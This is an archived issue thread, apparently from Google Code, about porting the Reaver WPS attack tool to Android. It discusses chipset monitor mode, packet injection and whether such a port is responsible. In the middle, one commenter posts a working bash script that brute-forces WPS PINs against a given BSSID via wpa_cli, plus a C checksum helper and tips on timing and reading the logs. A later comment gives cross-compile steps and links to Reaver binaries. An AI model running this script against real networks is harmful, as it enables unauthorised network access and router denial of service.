Open GoogleCodeExporter opened 9 years ago
Can you get packet injection working on your android phone?
I guess that might/will be the biggest problem.
Unless you can inject packets I don't see it happening
Original comment by jcdento...@gmail.com
on 31 Dec 2011 at 2:29
Some time ago I got monitor mode and packet injection working on the G1 (wifi
chipset wl1251) thanks to N900 patches, so at least on the G1 / Hero / Magic (all have
wl1251) it should be possible.
http://forum.xda-developers.com/showthread.php?t=1271854
Original comment by zewe...@gmail.com
on 31 Dec 2011 at 4:53
Supply me an android phone that will do monitor+inject and I will make it
happen.
-peter
Original comment by peac...@tacnetsol.com
on 1 Jan 2012 at 1:39
If an A855 Motorola Droid can do monitor+inject, I can produce a working
handset.
Original comment by a...@findlaypc.com
on 3 Jan 2012 at 12:48
Most Motorola phones use TI chipsets which are not capable.
Original comment by peac...@tacnetsol.com
on 3 Jan 2012 at 2:58
If I provide a micro Linux embedded device that runs an OpenWrt distro, might it be
possible to release a port?
Original comment by spyphone...@gmail.com
on 4 Jan 2012 at 1:22
Original comment by cheff...@tacnetsol.com
on 11 Jan 2012 at 4:54
Some devices support USB-OTG, which would enable a kernel module, like rtl8187,
for use with a USB wireless adapter.
Original comment by ryanjna...@gmail.com
on 13 Jan 2012 at 7:04
I think that this tool needs to stay on PC. Because today any kiddie with this
tool and an Android smartphone can then hack their neighbors' network and cause all
kinds of trouble. And honestly we don't want an increase in kid hackers.
Original comment by renny.to...@gmail.com
on 5 Feb 2012 at 1:42
not just that but this tool boots clients off their routers.. we don't need
this in the hands of idiots =] or a windows version
what's wrong with a netbook like the eee? < 1 sec a pin on a cisco router.. I
wish there was a paypal to donate- I'd send a few bucks.. some really good code
here and he's integrating it into aircrack.. I see the site is selling a idiot
box to do this but if you have 600 bucks to throw around- then you are probably
proficient in other areas of life.. so have at it- I'm worried about the 12
year old snufalufagus with his phone denying his neighbors wifi by pressing a
button
it's like giving airpwn and a yagi to a moron and expecting him not to use it
on starbucks
between this and pyrit, it's no wonder I run wired at home with a long pass to
my ap.. even the brand new att routers are still vulnerable to the same attacks
as the last set, 100% breakable with the default key using wpa2.. who's in
charge of security over there, a cow maybe
Original comment by benbar...@gmail.com
on 5 Feb 2012 at 4:38
Considering that there is little consistency regarding android hardware this is
not the most likely port to occur, if it does then no doubt people will have to
buy the appropriate model (and revision) of phone (and a few sets of spare
batteries)
I'm sensing childishness though regarding the seeming anger regarding script
kiddies. Do you really think that the script kiddies don't have laptops &
netbooks? If you were particularly knowledgeable you wouldn't be shouting
about keeping the tool PC only.
With Beagleboards, shivaplugs, Raspberry Pi and modded Pogoplugs there are a
multitude of low power consumption devices with USB (to use a network adaptor
of choice) to cause problems with (high powered antenna are not necessary with
such a setup) so don't be getting so precious folks, calm down
BTW there is real Wifi kit out there (I work with it) that live in retail
chains (and corporate land) strangely enough they do not use WPS, yes they have
been checked since christmas (to make sure they don't respond anyway), they are
much more interesting to play with than the average SoHo equipment
Original comment by kilby.ct...@gmail.com
on 6 Feb 2012 at 12:34
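A passive way to run the kind of check mentioned in the comment above (confirming that access points do not offer WPS), as an added example that is not part of the original thread: it parses a beacon's tagged parameters for the WPS vendor element (OUI 00:50:F2, type 4) and reports the WPS State and AP Setup Locked attributes. The function names and the sample beacon bytes are constructed for illustration.

```python
import struct

WPS_OUI_TYPE = bytes.fromhex("0050f204")  # vendor IE: OUI 00:50:F2, type 4 = WPS
ATTR_VERSION, ATTR_STATE, ATTR_LOCKED = 0x104A, 0x1044, 0x1057

def iter_ies(body):
    """Yield (tag, value) for each 802.11 information element; stop on truncation."""
    pos = 0
    while pos + 2 <= len(body):
        tag, length = body[pos], body[pos + 1]
        value = body[pos + 2:pos + 2 + length]
        if len(value) < length:       # truncated element: do not trust it
            return
        yield tag, value
        pos += 2 + length

def parse_wps_attrs(data):
    """Parse WPS attributes (2-byte type, 2-byte length, big-endian, then value)."""
    attrs, pos = {}, 0
    while pos + 4 <= len(data):
        atype, alen = struct.unpack_from(">HH", data, pos)
        value = data[pos + 4:pos + 4 + alen]
        if len(value) < alen:
            break
        attrs[atype] = value
        pos += 4 + alen
    return attrs

def wps_status(tagged_params):
    """Return None if no WPS element is advertised, else a summary dict."""
    for tag, value in iter_ies(tagged_params):
        if tag == 221 and value[:4] == WPS_OUI_TYPE:
            attrs = parse_wps_attrs(value[4:])
            return {
                "version": (attrs.get(ATTR_VERSION) or b"\x00")[0],
                "configured": attrs.get(ATTR_STATE) == b"\x02",
                "ap_setup_locked": attrs.get(ATTR_LOCKED) == b"\x01",
            }
    return None

def ie(tag, value):
    return bytes([tag, len(value)]) + value

def tlv(atype, value):
    return struct.pack(">HH", atype, len(value)) + value

# Constructed sample elements (not captured traffic).
SSID = ie(0, b"lab-ap")
RATES = ie(1, bytes.fromhex("82848b96"))
WMM = ie(221, bytes.fromhex("0050f202") + b"\x01\x01\x00")  # same OUI, not WPS
WPS_ON = ie(221, WPS_OUI_TYPE + tlv(ATTR_VERSION, b"\x10") + tlv(ATTR_STATE, b"\x02"))
WPS_LOCKED = ie(221, WPS_OUI_TYPE + tlv(ATTR_VERSION, b"\x10")
                + tlv(ATTR_STATE, b"\x02") + tlv(ATTR_LOCKED, b"\x01"))

if __name__ == "__main__":
    for name, body in [("wps advertised", SSID + RATES + WMM + WPS_ON),
                       ("wps locked", SSID + WPS_LOCKED),
                       ("no wps element", SSID + RATES + WMM)]:
        print(name, wps_status(body))
```

A `None` result only means the beacon does not advertise WPS; it describes what the access point announces, not how it answers a registration attempt.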
laptops and netbooks with windows running vmware and bt? yeah that's exactly
what they run.. but they've been limited to open and wep networks usually..
wpa2 solved with crunch piped to pyrit | cowpatty at 100k+/sec or dictionary
attack without a pre generated rainbow table is still out of skill set of the
snuffaluffagus.. they know nothing about these specific attacks or specialized
attacks on different types of routers, nothing because it takes more than
./configure make && make install..
reaver is so easy and automated, if it were to be ported to say ios for example
(jailbroke)- not just android (and it worked even with specific mass produced
phones), there would be jackass bowel movements all over the world.. I don't
care if a responsible geek manages to do this.. just the code he has written
here is almost too slick if you know what I'm sayin- he could have thrown in
some monkey wrenches =p I'm just sayin.. felt the same way about armitage..
anyways it's just my opinion on the matter.. what's sad is I noticed business
around here still running wep (even the bmw dealership's office runs wep here)
and at&t up to last year was still installing their 2wire routers with wep as
default
now they've switched to wpa2 but still have the same problem with the default
passkey, 10 characters numeric- that's 30 hours in pyrit for all the keys.. if
the wps pin attack didn't act like a dos on the router, I might not care- just
in the wrong hands this is a double butt violater
Original comment by benbar...@gmail.com
on 6 Feb 2012 at 9:14
I have to admit that for me an android version of reaver would be useful as the
people who hold the purse strings would get upset at a phone being used to
break their network security. For some reason 'management' still think that 'IT
professionals' are the only people on earth who have laptops (whatever an IT
professional is)
Anyway this will now be heading off topic
The biggest script kiddies I have ever encountered are so called professional
pen testers, they have their bought copy of Nessus on windows and a VM with
Backtrack then they simply follow their course notes, usually without much
understanding of the 'security issues' which they encounter.
However it has to be remembered that tomorrow's talented 'security researchers'
are today's beginners and very few beginners start with original methods.
Without reaver (or the other python script) would you be playing with WPS
breaking ?
I can answer an honest NO (for myself), though 15-20 years ago the answer would
have been Yes, as my life permitted me time to write interesting things.
If your answer is 'no' then please don't complain about idiots who have the
same tools as you, it happens and they have as much right as you have.
I used to be really uptight about the undeserving cut & paste coders &
crackers, I'm older now.
re: There's poor security all over, though sometimes there are reasons (mostly
arrogance, ignorance and cost) but sometimes it's unavoidable; legacy kit is
common, but the risk may be mitigated with careful firewalling, IDS and sanity
checking
Be thankful the tool exists in a reliable version and encourage its spread to
other platforms, you may have need of it at some point
Original comment by kilby.ct...@gmail.com
on 7 Feb 2012 at 10:28
Motorola Backflip here, it's the same shit as my laptop (Broadcom stuff). As
far as I tried, I could just enable monitor mode (buggy) and packet injection is
impossible. I'm pretty sure it can be done on another phone using a different
WLAN chipset.
Original comment by frapeti@gmail.com
on 25 Feb 2012 at 3:34
Just wait for a recent kernel. Thanks to mac80211 nearly every recent driver in
the vanilla kernel supports packet injection and monitor mode. Android phones
mostly just have very old kernels running.
Original comment by gentoo.l...@gmail.com
on 26 Feb 2012 at 4:17
If tcpdump, wpa_cli and bash are available for Android, which a quick bit of
recon tells me they are, then a workaround is more than likely possible. ;)
Original comment by ObiDanKi...@googlemail.com
on 28 Feb 2012 at 12:30
For those who are alright with their programming, here's some basic building
blocks for a potential Android WPS tester. I'm just beginning programming, but
with a bit of help I rustled this up... this is the latest code I have working
thus far, on a regular system that is....
Pre-requisites that would need to be working already on Android are...
Bash
Tcp-dump
Wpa-cli/wpa_supplicant
Tee
Ean8 (separate module... I will include code as a suffix)
Here's the code I have working at the mo.... The lines may get messed up, so I've
used me newly created #EL Tags to show where new lines are. Remove at own
discretion.
Name this file wpstester, or whatever you like ;), set its permissions, jobs a
good un. This is fairly system specific so you might need to tweak it here and
there to get it working properly.
#!/bin/bash #EL
sudo tcpdump -i wlan0 -v -l 2> /dev/null | tee /home/$USER/log.txt & #EL
sleep 7 #EL
for i in {0..1}; do #EL
code=$(printf "%04d"000 $i) #EL
ans=$(ean8 $code) #EL
echo "Time : $(date +%H:%M:%S)" >> /home/$USER/log1.txt #EL
echo "BSSID : BSSID HERE" >> /home/$USER/log1.txt #EL
echo "WPS PIN : $ans" #EL
echo "WPS PIN : $ans" >> /home/$USER/log1.txt #EL
wpa_cli wps_reg BSSID HERE $ans >> /dev/null #EL
sleep 15 #EL
done #EL
for i in {2..2000}; do #EL
code=$(printf "%04d"000 $i) #EL
ans=$(ean8 $code) #EL
echo "Time : $(date +%H:%M:%S)" >> /home/$USER/log1.txt #EL
echo "BSSID : BSSID HERE" >> /home/$USER/log1.txt #EL
echo "WPS PIN : $ans" #EL
echo "WPS PIN : $ans" >> /home/$USER/log1.txt #EL
wpa_cli wps_reg BSSID HERE $ans >> /dev/null #EL
sleep 10 #EL
done #EL
sudo kill -9 2> /dev/null $(ps -A | grep tcpdump | awk '{print$1}') #EL
exit 0 #EL
And the Ean8 Module.....
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char **argv) {
    int i, odd_sum = 0, even_sum = 0, sum, check_digit; // to install 'make ean8' or 'gcc -o ean8 ean8.c'
    char *base;                                         // then move exe to /bin path.

    if (argc != 2) {
        fprintf(stderr, "Error: Wrong number of arguments\n");
        exit(EXIT_FAILURE);
    }
    base = argv[1];
    if (strlen(base) != 7) {
        fprintf(stderr, "Error: Argument is not 7 characters\n");
        exit(EXIT_FAILURE);
    }
    for (i = 0; i < 7; i += 2) {
        // Odd digits
        odd_sum += base[i] - '0';
    }
    for (i = 1; i < 7; i += 2) {
        // Even digits
        even_sum += base[i] - '0';
    }
    sum = odd_sum * 3 + even_sum;
    check_digit = (10 - (sum % 10)) % 10;
    printf("%s%d\n", base, check_digit);
    return(EXIT_SUCCESS);
}
There's some other little tweaks you may have to do as well, to a couple of the
other programs. I've posted what I did with those on the hints and tips part of
this forum.
Maybe this will help someone along the line come up with a workaround for
Android... who knows..... If a Reaver port isn't forthcoming.
Only downside is this workaround is a bit slower than Reaver, until I figure
out how to implement small DH keys by tweaking the code in more than likely
wpa_supplicant/wpa_cli.
Good luck dudes/dudettes ;)
Original comment by ObiDanKi...@googlemail.com
on 6 Apr 2012 at 3:29
P.S. the third sleep command can be set as a variable to whatever you find the
minimum try time is before you fry/crash the router you are testing.
There is a trend I noticed whereby the first 1-2 tries take slightly longer
than the average send time, and if you put a longer sleep time for the first
1-2 attempts, then the following attempts can actually be sped up
significantly. Granted this isn't as fast as Reaver's small DH keys, but for a
work-around I guess it's o.k. ;)
Original comment by ObiDanKi...@googlemail.com
on 6 Apr 2012 at 3:36
Sorry triple post....Then you just have to grep the log files for 'id 4'. (Off
the top of my head, might be 'id 3' though =P) That result cross-correlates
with the time in the other log-file and there you have the first 4 digits of
the wps pin.
Original comment by ObiDanKi...@googlemail.com
on 6 Apr 2012 at 3:40
Haha sorry last thing.
In the original post on the hints and tips part I mentioned using Wireshark.
You can use this method if you want, but the newer post above creates a
semi-automatic solution (i.e. it's better), by using the generically available
tcpdump instead, and integrating it as a co-process in the source code.
Perhaps someone else can then take this and fully automate it. The next step
was to integrate a sectional grepping procedure... i.e. test 1..100 pins then
stop grep... check for 'id 3 (or 4)', continue...
I suppose I can continue my quest though, it's actually a fascinating project
for learning a little programming =P.
Original comment by ObiDanKi...@googlemail.com
on 6 Apr 2012 at 4:00
Any progress with reaver working with android?
Original comment by sheen...@googlemail.com
on 15 May 2012 at 9:11
Yes. Put backtrack 5 on android!
Original comment by ffej5...@gmail.com
on 18 Jun 2012 at 3:53
N900 and N950 have reaver.
Original comment by ifle...@gmail.com
on 11 Aug 2012 at 9:40
Monitor mod in android un possible. http://bcmon.blogspot.fi/. now only what we
need is reaver :)
Original comment by pta...@gmail.com
on 23 Sep 2012 at 1:56
OMG, so much thanks for that link !!!!1 ;DDDD
Original comment by fals3...@gmail.com
on 23 Sep 2012 at 3:12
Anyway Reaver needs root, that's why it wouldn't be a program for children :-)
Original comment by NosovK
on 29 Sep 2012 at 11:16
Is there any way to boot it in Symbian OS?
Original comment by kostad...@yahoo.com
on 29 Jan 2013 at 12:20
Any updates? I'd love to get reaver on my phone.
Original comment by jellekoo...@gmail.com
on 2 Mar 2013 at 11:18
hey there android supports now rtl 8187 chipset in monitor mode via USB-OTG no
root required
http://www.kismetwireless.net/android-pcap/
might be that injection would work too... so anyone out there ready to make
reaver-android port??
Original comment by gustarba...@gmail.com
on 4 Mar 2013 at 10:56
HD2 with Android and Backtrack installed.
I have compiled and installed the bcm4329 driver with monitor mode, which works
correctly with airmon and aireplay.
Also, I have compiled and installed Reaver, but there is a support problem.
Reaver will not associate (a timeout occurs).
After aireplay fakeauth, Reaver associates but starts getting
WARNING: Receive timeout occurred
Recorded PCAP file with both the Reaver association attempt and the association
after aireplay:
https://www.dropbox.com/s/bjsq8q2hfuyv7tc/rr-02.cap
Original comment by petar.bojovic.paxy@gmail.com
on 23 Jun 2013 at 8:34
Just checked from another computer that monitored the same AP activity. No
packet is actually sent from the HD2 via Reaver.
Only when I used aireplay was a packet really sent.
rr-02.cap shows the packet capture from the same device as Reaver.
Driver Developer mentioned following:
"Radiotap - we don't handle radiotap on packet injection. 'aireplay-ng' works
fine with it but tools like 'reaver' seem to require it."
Can you add support for packet injection without Radiotap? (Like in
aireplay)
Original comment by petar.bojovic.paxy@gmail.com
on 23 Jun 2013 at 11:28
People, new update on monitor mode on Android:
http://bcmon.blogspot.de/2013/07/monitor-mode-reloaded_14.html
As far as I know that was one of the big problems behind not having Reaver ported to
Android.
#35
How did you compile and install Reaver on Android? I'm on a Nexus 7 with
CyanogenMod 10.1.2. Thanks in advance.
Original comment by lord...@gmail.com
on 23 Jul 2013 at 11:29
Done.
http://forum.xda-developers.com/showthread.php?t=2456888
Original comment by davidw.s...@gmail.com
on 24 Sep 2013 at 7:49
BCMON.apk does not work correctly with HD2 (ICS myMIUI ROM).
ping_bcmon does not return packets.
I have tested the supplied reaver with older (2012) bcmon kernel module drivers;
reaver starts fine but will not inject packets. The function pcap_inject is
processed without exception but the packet does not leave the interface.
Original comment by petar.bojovic.paxy@gmail.com
on 26 Sep 2013 at 8:40
I feel like no one read anything that was being written on this blog
previously. Did no one notice that it's a good thing to not have tons of people
have this on their iPhones? Keep it to yourself. Don't post android ROMs with
reaver already installed online. Just do it by yourself. Do not jeopardize
Internet security for temporary happiness. That's terrorism. I feel like there
are only a few software engineers who would like to be terrorists.
Original comment by BflatMas...@gmail.com
on 27 Oct 2013 at 12:10
Ok calm down francis
Original comment by peeon...@gmail.com
on 27 Oct 2013 at 12:26
Jeopardizing Internet security? Sheesh.
If Reaver works on it, it was already insecure long before it became easy...
Original comment by a...@findlaypc.com
on 27 Oct 2013 at 3:43
Hello everyone, can anyone help me install reaver? It gives me an error,
pleaseeeeeeeeee:
./configure
checking for gcc... gcc
checking whether the C compiler works... no
configure: error: in `/root/reaver-1.4/src':
configure: error: C compiler cannot create executables
See `config.log' for more details.
Original comment by tawakoli...@gmail.com
on 30 Oct 2014 at 11:30
I installed bcmon and reaver for Android, but when I opened RfA and tested the
monitor mode it showed me an error that monitor mode activation failed. What to
do now?
Original comment by ajaybish...@gmail.com
on 12 Feb 2015 at 4:40
Porting reaver-wps for Android ARM platform
Steps:
1 - Install the ARM GNUEABI cross-compiler (sudo apt-get install gcc-4.7-arm-linux-gnueabi g++-4.7-arm-linux-gnueabi)
2 - Download http://www.infradead.org/~tgr/libnl/files/libnl-3.2.25.tar.gz
3 - Download http://www.tcpdump.org/release/libpcap-1.7.4.tar.gz
4 - Download the Reaver-WPS source
5 - Extract libnl-3.2.25.tar.gz and libpcap-1.7.4.tar.gz
6 - Run the configure script to build the Makefile for LIBNL3 (./configure --prefix=/system --host=arm-linux-gnueabi LDFLAGS='-static -L/system/lib' && make && sudo make install)
7 - Run the configure script to build the Makefile for LIBPCAP (./configure --prefix=/system --host=arm-linux-gnueabi --with-pcap=linux CFLAGS='-I/system/include/libnl3' LDFLAGS='-static -L/system/lib' && make && sudo make install)
8 - Download https://www.sqlite.org/2015/sqlite-autoconf-3081101.tar.gz SQLITE3 (./configure --prefix=/system --host=arm-linux-gnueabi CFLAGS='-L/system/include' LDFLAGS='-static -L/system/lib' && make && sudo make install)
9 - Configure and compile Reaver-WPS for ARM: ./configure --prefix=/system --sysconf=/etc && make V=1 CC=arm-linux-gnueabi-gcc CFLAGS='-pthread -s -static'
10 - Copy the statically compiled wash and reaver files to /system/xbin on a rooted device (my rooted CM12 device is an XT1069 using Dongle USB OTG TL-WR721N TP-LINK firmware kernel ath9k_htc modules ARM)
compiled binary files static
https://mega.co.nz/#!ZcN0EZoZ!DSSGCI4VV1O9eNd-fzmcr0Hu-t5XWxHfU9RJcaSn8D4
https://mega.co.nz/#!wd1EFZia!bROKZ4TFKx24w7niTMcZCU1YGw3D-QpwWUl5AZhW4uY
Reaver-WPS GUI APK
http://forum.xda-developers.com/showthread.php?t=2456888
have Fun :)
Original comment by mudg...@gmail.com
on 1 Aug 2015 at 3:26
Original issue reported on code.google.com by
fals3...@gmail.com
on 31 Dec 2011 at 1:49